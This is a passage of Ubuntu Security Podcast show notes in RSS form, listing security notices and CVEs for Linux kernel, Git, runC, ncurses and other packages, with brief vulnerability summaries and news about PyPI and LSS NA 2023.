<li><a href="https://ubuntu.com/security/CVE-2023-1075">CVE-2023-1075</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-1074">CVE-2023-1074</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-1073">CVE-2023-1073</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-0459">CVE-2023-0459</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-0458">CVE-2023-0458</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-0394">CVE-2023-0394</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-0210">CVE-2023-0210</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-48424">CVE-2022-48424</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-48423">CVE-2022-48423</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-4842">CVE-2022-4842</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-4129">CVE-2022-4129</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-3707">CVE-2022-3707</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-36280">CVE-2022-36280</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-27672">CVE-2022-27672</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>22.10 GCP, 22.04 HWE</li>
<li>Same as above</li>
</ul>
<h3 id="usn-6092-1-linux-kernel--azure--vulnerabilities--03-45">[<a href="https://ubuntu.com/security/notices/USN-6092-1">USN-6092-1</a>] Linux kernel (Azure) vulnerabilities (03:45)</h3>
<ul>
<li>5 CVEs addressed in Trusty ESM (14.04 ESM), Xenial ESM (16.04 ESM), Bionic (18.04 LTS)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2023-1118">CVE-2023-1118</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-32269">CVE-2023-32269</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-2162">CVE-2023-2162</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-1513">CVE-2023-1513</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-0459">CVE-2023-0459</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>4.15 Azure on both 18.04, 16.04 ESM + 14.04 ESM</li>
</ul>
<h3 id="usn-6093-1-linux-kernel--bluefield--vulnerabilities--03-54">[<a href="https://ubuntu.com/security/notices/USN-6093-1">USN-6093-1</a>] Linux kernel (BlueField) vulnerabilities (03:54)</h3>
<ul>
<li>9 CVEs addressed in Focal (20.04 LTS)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2023-26545">CVE-2023-26545</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-1074">CVE-2023-1074</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-1073">CVE-2023-1073</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-0458">CVE-2023-0458</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-4129">CVE-2022-4129</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-3903">CVE-2022-3903</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-3108">CVE-2022-3108</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-1281">CVE-2023-1281</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-1829">CVE-2023-1829</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>5.4</li>
<li>NVIDIA BlueField platform</li>
</ul>
<h3 id="usn-6094-1-linux-kernel-vulnerabilities--04-02">[<a href="https://ubuntu.com/security/notices/USN-6094-1">USN-6094-1</a>] Linux kernel vulnerabilities (04:02)</h3>
<ul>
<li>8 CVEs addressed in Bionic (18.04 LTS), Focal (20.04 LTS)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2023-1118">CVE-2023-1118</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-32269">CVE-2023-32269</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-2162">CVE-2023-2162</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-1513">CVE-2023-1513</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-1078">CVE-2023-1078</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-1075">CVE-2023-1075</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-0459">CVE-2023-0459</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-3707">CVE-2022-3707</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>5.4 20.04 / 18.04 HWE on all generic, Azure, GKE, IBM, OEM, AWS, KVM, Low
latency etc</li>
</ul>
<h3 id="usn-6095-1-linux-kernel-vulnerabilities--04-29">[<a href="https://ubuntu.com/security/notices/USN-6095-1">USN-6095-1</a>] Linux kernel vulnerabilities (04:29)</h3>
<ul>
<li>5 CVEs addressed in Xenial ESM (16.04 ESM), Bionic (18.04 LTS)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2023-1118">CVE-2023-1118</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-32269">CVE-2023-32269</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-2162">CVE-2023-2162</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-1513">CVE-2023-1513</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-0459">CVE-2023-0459</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>4.15 18.04 snapdragon + raspi2; 16.04 HWE etc</li>
</ul>
<h3 id="usn-6050-2-git-vulnerabilities--04-50">[<a href="https://ubuntu.com/security/notices/USN-6050-2">USN-6050-2</a>] Git vulnerabilities (04:50)</h3>
<ul>
<li>2 CVEs addressed in Xenial ESM (16.04 ESM)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2023-29007">CVE-2023-29007</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-25652">CVE-2023-25652</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>RCE via a crafted <code>.gitmodules</code> file with submodule URLs longer than 1024
chars - could inject arbitrary config into the users git config - eg. could
configure the pager or editor etc to run some arbitrary command</li>
<li>Local file overwrite via crafted input to <code>git apply --reject</code></li>
</ul>
<h3 id="usn-6088-1-runc-vulnerabilities--05-39">[<a href="https://ubuntu.com/security/notices/USN-6088-1">USN-6088-1</a>] runC vulnerabilities (05:39)</h3>
<ul>
<li>3 CVEs addressed in Bionic (18.04 LTS), Focal (20.04 LTS), Jammy (22.04 LTS), Kinetic (22.10), Lunar (23.04)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2023-28642">CVE-2023-28642</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-27561">CVE-2023-27561</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-25809">CVE-2023-25809</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>Vuln where the cgroup hierarchy of the host may be exposed within the
container and be writable - could possibly use this to privesc</li>
<li>Regression from a previous vuln fix in CVE-2019-19921 (see <a href="/episode-66/#usn-4297-1-runc-vulnerabilities-01-30">[USN-4297-1] runC vulnerabilities in Episode 66</a>)</li>
<li>Possible to bypass AppArmor (or SELinux) restrictions on runc if a container</li>
</ul>
<h3 id="usn-6088-2-runc-vulnerabilities--06-26">[<a href="https://ubuntu.com/security/notices/USN-6088-2">USN-6088-2</a>] runC vulnerabilities (06:26)</h3>
<ul>
<li>6 CVEs addressed in Xenial ESM (16.04 ESM)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2023-28642">CVE-2023-28642</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-27561">CVE-2023-27561</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-25809">CVE-2023-25809</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-29162">CVE-2022-29162</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-43784">CVE-2021-43784</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2019-19921">CVE-2019-19921</a> <!-- raw HTML omitted --></li>
</ul>
</li>
</ul>
<h3 id="usn-6086-1-minimatch-vulnerability--06-31">[<a href="https://ubuntu.com/security/notices/USN-6086-1">USN-6086-1</a>] minimatch vulnerability (06:31)</h3>
<ul>
<li>1 CVEs addressed in Bionic (18.04 LTS), Focal (20.04 LTS)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2022-3517">CVE-2022-3517</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>ReDoS against nodejs package</li>
</ul>
<h3 id="usn-6087-1-ruby-vulnerabilities--06-39">[<a href="https://ubuntu.com/security/notices/USN-6087-1">USN-6087-1</a>] Ruby vulnerabilities (06:39)</h3>
<ul>
<li>2 CVEs addressed in Xenial ESM (16.04 ESM), Bionic (18.04 LTS), Focal (20.04 LTS)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2023-28756">CVE-2023-28756</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-28755">CVE-2023-28755</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>Speaking of ReDoS - two in ruby - mentioned previously in
<a href="/episode-194/#usn-6055-2-ruby-regression--03-11">[USN-6055-2] Ruby regression Episode 194</a> - has been
fixed properly now without introducing the previous regression</li>
</ul>
<h3 id="usn-5900-2-tar-vulnerability--07-03">[<a href="https://ubuntu.com/security/notices/USN-5900-2">USN-5900-2</a>] tar vulnerability (07:03)</h3>
<ul>
<li>1 CVEs addressed in Lunar (23.04)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2022-48303">CVE-2022-48303</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li><a href="/episode-189/#usn-5900-1-tar-vulnerability-06-15">[USN-5900-1] tar vulnerability from Episode 189</a></li>
</ul>
<h3 id="usn-5996-2-libloius-vulnerabilities--07-17">[<a href="https://ubuntu.com/security/notices/USN-5996-2">USN-5996-2</a>] Libloius vulnerabilities (07:17)</h3>
<ul>
<li>3 CVEs addressed in Lunar (23.04)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2023-26769">CVE-2023-26769</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-26768">CVE-2023-26768</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-26767">CVE-2023-26767</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>Braille translation library</li>
<li>3 different buffer overflows</li>
</ul>
<h3 id="usn-6099-1-ncurses-vulnerabilities--07-27">[<a href="https://ubuntu.com/security/notices/USN-6099-1">USN-6099-1</a>] ncurses vulnerabilities (07:27)</h3>
<ul>
<li>5 CVEs addressed in Trusty ESM (14.04 ESM), Xenial ESM (16.04 ESM), Bionic (18.04 LTS), Focal (20.04 LTS), Jammy (22.04 LTS), Kinetic (22.10), Lunar (23.04)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2023-29491">CVE-2023-29491</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-29458">CVE-2022-29458</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-39537">CVE-2021-39537</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2019-17595">CVE-2019-17595</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2019-17594">CVE-2019-17594</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>Most interesting vuln here was possible memory corruption via malformed
terminfo database which can be set via <code>TERMINFO</code> of though <code>~/.terminfo</code> - will
get used by a <code>setuid</code> binary as well - turns out though that ncurses has a
build-time configuration option to disable the use of custom terminfo/termcap
when running - fixed this by enabling that</li>
</ul>
<h3 id="usn-6073-6-usn-6073-7-usn-6073-8-usn-6073-9-cinder-glance-store-nova-os-brick-regressions--08-34">[<a href="https://ubuntu.com/security/notices/USN-6073-6">USN-6073-6</a>, <a href="https://ubuntu.com/security/notices/USN-6073-7">USN-6073-7</a>, <a href="https://ubuntu.com/security/notices/USN-6073-8">USN-6073-8</a>, USN-6073-9] Cinder, Glance store, Nova, os-brick regressions (08:34)</h3>
<ul>
<li>Affecting Focal (20.04 LTS), Jammy (22.04 LTS), Kinetic (22.10), Lunar (23.04)</li>
<li><a href="/episode-195/#usn-6073-1-usn-6073-2-usn-6073-3-usn-6073-4-cinder-glance-store-nova-os-brick-vulnerability--03-14">[USN-6073-1, USN-6073-2, USN-6073-3, USN-6073-4] Cinder, Glance Store, Nova, os-brick vulnerability from Episode 195</a></li>
</ul>
<h3 id="usn-5725-2-go-vulnerability--08-50">[<a href="https://ubuntu.com/security/notices/USN-5725-2">USN-5725-2</a>] Go vulnerability (08:50)</h3>
<ul>
<li>1 CVEs addressed in Xenial ESM (16.04 ESM)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2020-16845">CVE-2020-16845</a> <!-- raw HTML omitted --></li>
</ul>
</li>
</ul>
<h3 id="usn-6042-2-cloud-init-regression--08-55">[<a href="https://ubuntu.com/security/notices/USN-6042-2">USN-6042-2</a>] Cloud-init regression (08:55)</h3>
<ul>
<li>Affecting Focal (20.04 LTS)</li>
<li>Published an update to cloud-init a few weeks ago - this was due to a vuln
where credentials may get accidentally logged to the cloud-init log file -
this was a newer version of cloud-init and it relied on a feature in the
netplan package that was not published to the security pocket - easy fix would
be to publish this version of netplan to -security but this is not in the
spirit of the pocket - so instead cloud-init was updated to include a fallback
to ensure routes were appropriately retained</li>
</ul>
<h3 id="usn-6098-1-jhead-vulnerabilities--09-48">[<a href="https://ubuntu.com/security/notices/USN-6098-1">USN-6098-1</a>] Jhead vulnerabilities (09:48)</h3>
<ul>
<li>8 CVEs addressed in Trusty ESM (14.04 ESM), Xenial ESM (16.04 ESM), Bionic (18.04 LTS), Focal (20.04 LTS)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2021-28278">CVE-2021-28278</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-28276">CVE-2021-28276</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-26208">CVE-2020-26208</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-6625">CVE-2020-6625</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-6624">CVE-2020-6624</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2019-1010302">CVE-2019-1010302</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2019-1010301">CVE-2019-1010301</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2019-19035">CVE-2019-19035</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>EXIF JPEG header manipulation tool written in C</li>
<li>Heap buffer overflows, NULL ptr derefs, OOB reads etc</li>
</ul>
<h3 id="usn-6102-1-xmldom-vulnerabilities--10-12">[<a href="https://ubuntu.com/security/notices/USN-6102-1">USN-6102-1</a>] xmldom vulnerabilities (10:12)</h3>
<ul>
<li>3 CVEs addressed in Focal (20.04 LTS), Jammy (22.04 LTS), Kinetic (22.10)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2022-39353">CVE-2022-39353</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-37616">CVE-2022-37616</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-21366">CVE-2021-21366</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>NodeJS javascript DOMParser and XMLSerializer</li>
<li>Logic error where failed to preserve identifiers or namespaces when parsing
malicious documents</li>
<li>Prototype pollution</li>
<li>Parses documents with multiple top-level elements and combines all their
elements</li>
</ul>
<h3 id="usn-6101-1-gnu-binutils-vulnerabilities--10-50">[<a href="https://ubuntu.com/security/notices/USN-6101-1">USN-6101-1</a>] GNU binutils vulnerabilities (10:50)</h3>
<ul>
<li>6 CVEs addressed in Trusty ESM (14.04 ESM), Xenial ESM (16.04 ESM), Bionic (18.04 LTS), Focal (20.04 LTS), Jammy (22.04 LTS), Kinetic (22.10), Lunar (23.04)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2023-25588">CVE-2023-25588</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-25586">CVE-2023-25586</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-25585">CVE-2023-25585</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-25584">CVE-2023-25584</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-1972">CVE-2023-1972</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-1579">CVE-2023-1579</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>Assembler, linker and other utils for handling binary files</li>
<li>Generally not expected to be fed untrusted input, but notheless
<ul>
<li>various buffer overflows (read and write) - DoS / RCE</li>
</ul>
</li>
</ul>
<h3 id="usn-6074-3-firefox-regressions--11-38">[<a href="https://ubuntu.com/security/notices/USN-6074-3">USN-6074-3</a>] Firefox regressions (11:38)</h3>
<ul>
<li>11 CVEs addressed in Bionic (18.04 LTS), Focal (20.04 LTS)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2023-32209">CVE-2023-32209</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-32208">CVE-2023-32208</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-32206">CVE-2023-32206</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-32216">CVE-2023-32216</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-32215">CVE-2023-32215</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-32213">CVE-2023-32213</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-32212">CVE-2023-32212</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-32211">CVE-2023-32211</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-32210">CVE-2023-32210</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-32207">CVE-2023-32207</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-32205">CVE-2023-32205</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>113.0.2</li>
</ul>
<h3 id="usn-6103-1-json-schema-vulnerability--11-50">[<a href="https://ubuntu.com/security/notices/USN-6103-1">USN-6103-1</a>] JSON Schema vulnerability (11:50)</h3>
<ul>
<li>1 CVEs addressed in Bionic (18.04 LTS), Focal (20.04 LTS)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2021-3918">CVE-2021-3918</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>NodeJS package for JSON document manipulation - prototype pollution vuln
<ul>
<li><a href="/episode-192/#usn-5967-1-object-path-vulnerabilities-02-11">[USN-5967-1] object-path vulnerabilities from Episode 192</a></li>
</ul>
</li>
</ul>
<h2 id="goings-on-in-ubuntu-security-community">Goings on in Ubuntu Security Community</h2>
<h3 id="security-related-announcements-from-pypi--12-21">Security related announcements from PyPI (12:21)</h3>
<ul>
<li>
<p><a href="https://blog.pypi.org/posts/2023-05-23-removing-pgp/">Removing PGP from PyPI</a></p>
<ul>
<li>will no longer support new PGP signatures for PyPI packages in response to a
recent <a href="https://blog.yossarian.net/2023/05/21/PGP-signatures-on-PyPI-worse-than-useless">public blog post</a> detailing an audit of the PGP ecosystem with PyPI
<ul>
<li>most devs not uploading PGP signatures and of those that were, 30% were
not available on major public keyservers and of those that were nearly
half were not able to be meaningfully verified - some had expired,
others had no binding signature to be able to verify them</li>
</ul>
</li>
</ul>
</li>
<li>
<p><a href="https://blog.pypi.org/posts/2023-05-24-pypi-was-subpoenaed/">PyPI was subpoenaed</a></p>
<ul>
<li>Ordered by DOJ to provide details on 5 PyPI usernames, including names,
addresses, connection records, payment details, which packages and IP logs
etc</li>
<li>Provided these details after consulting with their lawyers</li>
<li>Includes the specific attributes which were provided including the database
queries used to lookup those records</li>
<li>likely in response to recent security issues like typosquatting of popular
packages with credential stealers and other malware embedded - over the past
weekend, account sign-up and package uploads were blocked due to an
overwhelming large number of malicious users and projects being created
which the admins could not keep up with</li>
</ul>
</li>
<li>
<p><a href="https://blog.pypi.org/posts/2023-05-25-securing-pypi-with-2fa/">Securing PyPI accounts via Two-Factor Authentication</a></p>
<ul>
<li>Every account that maintains a project / organisation will be required to
enable 2FA by the end of this year
<ul>
<li>supports both TOTP and WebAuthN</li>
</ul>
</li>
<li>Already announced this for most critical projects <a href="https://pypi.org/security-key-giveaway/">last year</a> where they gave
away Google Titan security keys to those projects and mandated them to use
2FA</li>
</ul>
</li>
</ul>
<h3 id="lss-na-2023--16-11">LSS NA 2023 (16:11)</h3>
<ul>
<li>Attended by John Johansen and Mark Esler from the Ubuntu Security Team</li>
<li>John presented in the <a href="https://youtu.be/7wkEWeRIwy8">LSM Maintainers Panel</a> with Mickaël Salaün, Casey
Schaufler, Mimi Zohar &amp; moderated by Paul Moore</li>
<li>All presentations now online: <a href="https://www.youtube.com/playlist?list=PLbzoR-pLrL6q4vmwFP7-ZZ1LJc5mA3Hqu">https://www.youtube.com/playlist?list=PLbzoR-pLrL6q4vmwFP7-ZZ1LJc5mA3Hqu</a></li>
<li>Lots of interesting bits like:
<ul>
<li><a href="https://youtu.be/Qc75hobVjbo">systemd and TPM2</a></li>
<li><a href="https://youtu.be/ewmMs563jv0">Verifiable End to End Secure OCI Native Machines</a></li>
<li><a href="https://youtu.be/V2kzptQG5_A">Progress on Bounds Checking in C and the Linux Kernel</a>
<ul>
<li>for more great content with Kees check out <a href="/episode-145/#seth-and-john-talk-linux-kernel-security-with-kees-cook-06-53">Seth and John talk Linux Kernel Security with Kees Cook from Episode 145</a></li>
</ul>
</li>
<li><a href="https://youtu.be/OzyalrOzxE8">Building the Largest Working Set of Apparmor Profiles</a></li>
<li><a href="https://youtu.be/UB10wtNEMlM">Controlling Script Execution</a></li>
</ul>
</li>
</ul>
<h3 id="announcement-of-18-dot-04-lts-going-into-esm-on-31-may-2023--18-55">Announcement of 18.04 LTS going into ESM on 31 May 2023 (18:55)</h3>
<ul>
<li><a href="https://lists.ubuntu.com/archives/ubuntu-security-announce/2023-May/007371.html">https://lists.ubuntu.com/archives/ubuntu-security-announce/2023-May/007371.html</a></li>
<li>18.04 LTS released on 26 April 2018</li>
<li><a href="https://canonical.com/blog/18-04-end-of-standard-support">https://canonical.com/blog/18-04-end-of-standard-support</a></li>
</ul>
<h2 id="get-in-contact">Get in contact</h2>
<ul>
<li><a href="mailto:security@ubuntu.com">security@ubuntu.com</a></li>
<li><a href="https://libera.chat">#ubuntu-security on the Libera.Chat IRC network</a></li>
<li><a href="https://lists.ubuntu.com/mailman/listinfo/ubuntu-hardened">ubuntu-hardened mailing list</a></li>
<li><a href="https://discourse.ubuntu.com/c/security">Security section on discourse.ubuntu.com</a></li>
<li><a href="https://fosstodon.org/@ubuntusecurity">@ubuntusecurity@fosstodon.org</a>, <a href="https://twitter.com/ubuntu_sec">@ubuntu_sec on twitter</a></li>
</ul>
]]></content:encoded><itunes:image href="https://ubuntusecuritypodcast.org/img/usp_logo_500.png"></itunes:image>
          <googleplay:image href="https://ubuntusecuritypodcast.org/img/usp_logo_500.png"></googleplay:image><enclosure url="https://people.canonical.com/~amurray/USP/USP_E196.mp3" length="21180720" type="audio/mpeg" /><itunes:duration>1232</itunes:duration><itunes:explicit>false</itunes:explicit>
          <googleplay:explicit>no</googleplay:explicit></item>
        <item>
          
            <title>Episode 195
          
          
          </title>
          <link>https://ubuntusecuritypodcast.org/episode-195/</link>
          <pubDate>Fri, 19 May 2023 09:39:00 +0930 </pubDate>
          <dc:creator></dc:creator>
          <guid>a08dd8d12c01bc0652459f58bb61c6e52a0ec5b82606c802c6634c05c951ff17eb91d3fe5a84c58a3c02d4b6dc0dc5786c401f358f087623cc3b8f71279fb2c3</guid>
          <itunes:author>Ubuntu Security Team</itunes:author>
          
        
          <itunes:title>Episode 195</itunes:title>
        
        <itunes:subtitle><![CDATA[
        
          Alex and Camila discuss security update management strategies after a recent
  outage at Datadog was attributed to a security update for systemd on Ubuntu,
  plus we look at security vulnerabilities in the Linux kernel, OpenStack,
  Synapse,...
        
        ]]></itunes:subtitle>
        <itunes:summary>  Alex and Camila discuss security update management strategies after a recent
  outage at Datadog was attributed to a security update for systemd on Ubuntu,
  plus we look at security vulnerabilities in the Linux kernel, OpenStack,
  Synapse, OpenJDK and more.
  </itunes:summary>
        <description>  Alex and Camila discuss security update management strategies after a recent
  outage at Datadog was attributed to a security update for systemd on Ubuntu,
  plus we look at security vulnerabilities in the Linux kernel, OpenStack,
  Synapse, OpenJDK and more.
  </description>
        <googleplay:description>  Alex and Camila discuss security update management strategies after a recent
  outage at Datadog was attributed to a security update for systemd on Ubuntu,
  plus we look at security vulnerabilities in the Linux kernel, OpenStack,
  Synapse, OpenJDK and more.
  </googleplay:description>
        <content:encoded><![CDATA[<h2 id="overview">Overview</h2>
<p>Alex and Camila discuss security update management strategies after a recent
outage at Datadog was attributed to a security update for systemd on Ubuntu,
plus we look at security vulnerabilities in the Linux kernel, OpenStack,
Synapse, OpenJDK and more.</p>
<h2 id="this-week-in-ubuntu-security-updates">This week in Ubuntu Security Updates</h2>
<p>66 unique CVEs addressed</p>
<h3 id="usn-6069-1-linux-kernel--raspberry-pi--vulnerability--01-01">[<a href="https://ubuntu.com/security/notices/USN-6069-1">USN-6069-1</a>] Linux kernel (Raspberry Pi) vulnerability (01:01)</h3>
<ul>
<li>1 CVEs addressed in Bionic (18.04 LTS), Focal (20.04 LTS)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2023-1829">CVE-2023-1829</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>5.4 raspi in 20.04 / 18.04 HWE</li>
<li><a href="/episode-194/#usn-6058-1-linux-kernel-vulnerability--05-45">[USN-6058-1] Linux kernel vulnerability from Episode 194</a></li>
<li>UAF in Traffic-Control Index (TCINDEX) filter from April this year - fix
simply removes this classifier from the kernel</li>
</ul>
<h3 id="usn-6070-1-linux-kernel-vulnerabilities--01-37">[<a href="https://ubuntu.com/security/notices/USN-6070-1">USN-6070-1</a>] Linux kernel vulnerabilities (01:37)</h3>
<ul>
<li>2 CVEs addressed in Focal (20.04 LTS), Jammy (22.04 LTS)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2023-1872">CVE-2023-1872</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-1829">CVE-2023-1829</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>5.15 raspi in 22.04, Azure FDE in 20.04</li>
<li>TCINDEX UAF plus UAF in <code>io_uring</code></li>
</ul>
<h3 id="usn-6071-1-linux-kernel--oem--vulnerabilities--01-58">[<a href="https://ubuntu.com/security/notices/USN-6071-1">USN-6071-1</a>] Linux kernel (OEM) vulnerabilities (01:58)</h3>
<ul>
<li>12 CVEs addressed in Jammy (22.04 LTS)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2023-26545">CVE-2023-26545</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-23455">CVE-2023-23455</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-1859">CVE-2023-1859</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-4662">CVE-2022-4662</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-4095">CVE-2022-4095</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-40307">CVE-2022-40307</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-3586">CVE-2022-3586</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-3303">CVE-2022-3303</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-2590">CVE-2022-2590</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-0386">CVE-2023-0386</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-0468">CVE-2023-0468</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-1829">CVE-2023-1829</a> <!-- raw HTML omitted --></li>
